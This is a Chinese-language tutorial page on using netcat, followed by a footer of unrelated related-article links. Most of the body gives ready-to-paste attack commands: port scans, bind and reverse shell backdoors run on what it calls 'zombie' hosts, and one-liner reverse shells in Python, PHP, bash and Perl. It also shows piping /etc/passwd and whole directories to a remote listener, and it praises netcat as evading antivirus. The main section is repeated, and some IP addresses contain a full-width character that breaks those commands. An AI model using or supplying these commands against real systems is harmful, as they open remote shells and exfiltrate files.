netcat 黑客们的瑞士军刀,虽然小巧但是其功能一点也不弱,并且该工具天生免杀,值得你去尝试。

NCwindows反弹

1:正向连接

服务器执行:nc -l -p 8888 -e cmd.exe

本地主机执行:nc -vv 服务器ip 8888

2:反向连接

服务器执行:nc -e cmd.exe 公网ip 8888

公网主机执行:nc -lvp 8888

帮助信息

[root@localhost ~]# nc -help

-g <网关> 设置路由器跃程通信网关,最多可设置8个;

-G <指向器数目> 设置来源路由指向器,其数值为4的倍数;

-h 在线帮助;

-i <延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口;

-l 使用监听模式,管控传入的资料;

-n 直接使用IP地址,而不通过域名服务器;

-o <输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存;

-p <通信端口> 设置本地主机使用的通信端口;

-r 乱数指定本地与远端主机的通信端口;

-s <来源位址> 设置本地主机送出数据包的IP地址;

-u 使用UDP传输协议;

-v 显示指令执行过程;

-w <超时秒数> 设置等待连线的时间;

-z 使用0输入/输出模式,只在扫描通信端口时使用。

远程端口探测 连接远程主机的80端口,并获取到该端口的版本信息

lyshark@dell:~$ nc -nv 192.168.1.20 80

实现快速端口扫描 扫描目标主机开放的端口,例如从 70-100 那个端口是开放的

lyshark@dell:~$ nc -nvv -w2 -z 192.168.1.20 70-100        TCP扫描

lyshark@dell:~$ nc -nvv -w2 -z -u 192.168.1.20 70-100     UDP扫描

正向连接后门 正向连接后门,创建正向连接后门,无法过墙

[root@localhost ~]# nc -l -p 9999 -e /bin/sh      肉鸡执行

lyshark@dell:~$ nc -nv 192.168.1.20 9999          服务端执行

反向连接后门 反向连接后门,推荐使用。

[root@localhost ~]# nc -t -e /bin/sh 192.168.1.2 9999

服务端执行 nc -l -p 9999

远程传输文件 远程传输问渐渐,同理,这里不截图了。

[root@localhost ~]# nc 192.168.1.2 9999 < /etc/passwd

lyshark@dell:~/w$ nc -l 9999 > passwd.log

远程传输目录

lyshark@dell:~/w$ nc -l 9999 | tar xzvf -

[root@localhost etc]# tar -czf - * | nc 192.168.1.2 9999

Python 反弹端口

[root@localhost ~]# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

lyshark@dell:~$ nc -lvp 9999

其他反弹端口

php -r '$sock=fsockopen("192.168.1.2",9999);exec("/bin/sh -i <&3 >&3 2>&3");'    php 反弹

bash -i>&/dev/tcp/192.168.1。2/9999 0>&1                                        bash 反弹

perl -e 'use Socket;$i="192.168.1。2";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'   perl反弹


# 连接远程主机的80端口,并获取到该端口的版本信息

lyshark@dell:~$ nc -nv 192.168.1.20 80

# 扫描目标主机开放的端口,从70-100 那个端口是开放的

lyshark@dell:~$ nc -nvv -w2 -z 192.168.1.20 70-100         TCP扫描

lyshark@dell:~$ nc -nvv -w2 -z -u 192.168.1.20 70-100     UDP扫描

# 正向连接后门,创建正向连接后门,无法过墙

[root@localhost ~]# nc -l -p 9999 -e /bin/sh      肉鸡执行

lyshark@dell:~$ nc -nv 192.168.1.20 9999          服务端执行

# 反向连接后门

[root@localhost ~]# nc -t -e /bin/sh 192.168.1.2 9999

lyshark@dell:~$ nc -l -p 9999

#远程传输文件

[root@localhost ~]# nc 192.168.1.2 9999 < /etc/passwd

lyshark@dell:~/w$ nc -l 9999 > passwd.log

# 远程传输目录

lyshark@dell:~/w$ nc -l 9999 | tar xzvf -

[root@localhost etc]# tar -czf - * | nc 192.168.1.2 9999

# Python 反弹nc端口

[root@localhost ~]# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

lyshark@dell:~$ nc -lvp 9999

# 其他反弹端口

php -r '$sock=fsockopen("192.168.1.2",9999);exec("/bin/sh -i <&3 >&3 2>&3");'    php 反弹

bash -i>&/dev/tcp/192.168.1。2/9999 0>&1                                        bash 反弹

perl -e 'use Socket;$i="192.168.1。2";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'   perl反弹

NetCat 工具的常用使用技巧的更多相关文章

  1. java与.net比较学习系列(1) 开发环境和常用调试技巧

    最近因为公司项目要由.net平台转到java平台的原因,之前一直用.net的我不得不开始学习java了,刚开始听到说要转java的时候很抗拒,因为我想专注在.net平台上,不过这样也并不完全是坏事,通 ...

  2. vim常用操作技巧与配置

    vi是linux与unix下的常用文本编辑器,其运行稳定,使用方便,本文将分两部分对其常用操作技巧和配置进行阐述,其中参考了网上的一些文章,对作者表示感谢 PART1 操作技巧 说明: 以下的例子中  ...

  3. iOS开发之Xcode常用调试技巧总结

    转载自:iOS开发之Xcode常用调试技巧总结 最近在面试,面试过程中问到了一些Xcode常用的调试技巧问题.平常开发过程中用的还挺顺手的,但你要突然让我说,确实一脸懵逼.Debug的技巧很多,比如最 ...

  4. Matlab常用小技巧及部分快捷键

    Matlab常用小技巧一: 1. m文件如果是函数,保存的文件名最好与函数名一致,这点都很清楚.不过容易疏忽的是,m文件名的命名尽量不要是简单的英文单词,最好是由大小写英文/数字/下划线等组成.原因是 ...

  5. DevExpress Report 其他常用设计技巧

    原文:DevExpress Report 其他常用设计技巧 1 设置默认的打印纸张及页边距 选择Report-打开属性窗口,设置默认边距(Margins)和默认纸张(PaperKind). 2 修改R ...

  6. html5基础的常用的技巧

    html5基础的常用的技巧 1. 新的Doctype声明 XHTML的声明太长了,我相信很少会有前端开发人员能手写出这个Doctype声明. <!DOCTYPE html PUBLIC &quo ...

  7. web报表工具FineReport常用函数的用法总结(日期和时间函数)

    web报表工具FineReport常用函数的用法总结(日期和时间函数) 说明:凡函数中以日期作为参数因子的,其中日期的形式都必须是yy/mm/dd.而且必须用英文环境下双引号(" " ...

  8. 版本控制工具——Git常用操作(上)

    本文由云+社区发表 作者:工程师小熊 摘要:用了很久的Git和svn,由于总是眼高手低,没能静下心来写这些程序员日常开发最常用的知识点.现在准备开一个专题,专门来总结一下版本控制工具,让我们从git开 ...

  9. Go语言之进阶篇 netcat工具的使用

    一.netcat工具的使用 1.先安装netcat软件,再配置环境变量 2.tcp服务器代码 示例: package main import ( "fmt" "net&q ...

  10. javascript的40个网页常用小技巧

    下面是javascript的40个网页常用小技巧,对网站开发人员相信会有帮助.1. oncontextmenu="window.event.returnValue=false" 将 ...

随机推荐

  1. ChatGpt玩法(一):prompt使用的重要性

    前言 登录https://www.topgpt.one即可免费体验ChatGPT带来的强大魅力. ChatGpt是一个强大的自然语言处理工具,可以用于多种任务,如文本生成.问答系统以及对话生成等等.其 ...

  2. 【Docker】基础原理

    基础原理 基础流程 Docker镜像讲解 Docker容器讲解 创建容器的两种方式 容器创建命令详解

  3. C# RSA 非对称加密

    代码: RSAHelper.cs(RSA加密工具类): using System; using System.Security.Cryptography; using System.Text; nam ...

  4. 堆和栈:JS数据怎么存储的?

    JS数据存储主要分堆和栈两种, 栈空间:通常情况栈空间不会设置太大,主要用来存放一些原始类型的小数据,原始类型的数据有:Boolean.Null.Undefined.Number.BigInt.Str ...

  5. C#将日期格式化为指定格式

    private void btn_GetTime_Click(object sender, EventArgs e) { lab_time.Text = DateTime.Now.ToString(& ...

  6. Visual Studio2019 使用WCF服务

    什么是WCF Windows Communication Foundation (WCF) 是一个框架,用于生成面向服务的应用程序.它取代了较旧的进程间通信技术,例如 ASMX Web 服务..NET ...

  7. python常见面试题讲解(七)合并表记录

    题目描述 数据表记录包含表索引和数值(int范围的整数),请对表索引相同的记录进行合并,即将相同索引的数值进行求和运算,输出按照key值升序进行输出. 输入描述: 先输入键值对的个数然后输入成对的in ...

  8. React报错之Property does not exist on type 'JSX.IntrinsicElements'

    正文从这开始~ 总览 当组件名称以小写字母开头时,会导致"Property does not exist on type 'JSX.IntrinsicElements'"错误.为了 ...

  9. 【java】设置 tomcat 账号密码

    <role rolename="manager-gui"/> <user username="tomcat" password="t ...

  10. [转帖]CPU写入512bit要多久:从AVX到NEON

    https://zhuanlan.zhihu.com/p/677124882 写这篇文章的原因是有个项目需要降低延迟,希望能更快地把512bit的数据从内存搬进PCIe设备.原先的做法是软件写寄存器通 ...